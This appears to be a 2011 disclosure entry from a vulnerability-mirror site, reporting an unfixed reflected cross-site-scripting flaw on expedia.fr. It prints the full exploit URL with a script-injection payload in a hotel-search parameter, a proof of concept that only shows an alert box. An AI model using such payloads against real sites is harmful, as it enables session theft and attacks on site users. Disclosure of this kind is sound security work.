Security researcher Atmon3r, has submitted on 29/12/2011 a cross-site-scripting (XSS) vulnerability affecting www.expedia.fr, which at the time of submission ranked 14462 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 30/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 29/12/2011 |
Date published: 30/12/2011 |
Fixed? Mail us! | Status: UNFIXED |
Author: Atmon3r |
Domain: www.expedia.fr |
Category: XSS |
Pagerank: 14462 |
URL: http://www.expedia.fr/Hotel-Search?action=hotelSearchWizard%40searchHotelOnly&hotelSearchWizard_inpI tid=&hotelSearchWizard_inpItty=&hotelSearchWizard_inpItdx=&hotelSearchWizard_inpSearchMethod=usertyp ed&hotelSearchWizard_inpSearchKeywordIndex=&hotelSearchWizard_inpSearchKeyword=&hotelSearchWizard_in pSearchRegionId=&hotelSearchWizard_inpSearchLatitude=&hotelSearchWizard_inpSearchLongitude=&hotelSea rchWizard_inpSearchNear=/"><script>alert('Xss By Atm0n3r')</script>&hotelSearchWizard_inpSearchNearType=CITY&hotelSearchWizard_inpSearchNearStreetAdd r=&hotelSearchWizard_inpSearchNearCity=&hotelSearchWizard_inpSearchNearState=&hotelSearchWizard_inpS earchNearZipCode=&hotelSearchWizard_inpCheckIn=jj%2Fmm%2Faa&hotelSearchWizard_inpCheckOut=jj%2Fmm%2F aa&hotelSearchWizard_inpNumRooms=1&hotelSearchWizard_inpNumAdultsInRoom=1&hotelSearchWizard_inpNumCh ildrenInRoom=0&hotelSearchWizard_inpAddOptionFlag=&hotelSearchWizard_inpHotelName=&hotelSearchWizard _inpHotelClass=0&searchWizard_wizardType=hotelOnly |
Click here to view the mirror
|
|
|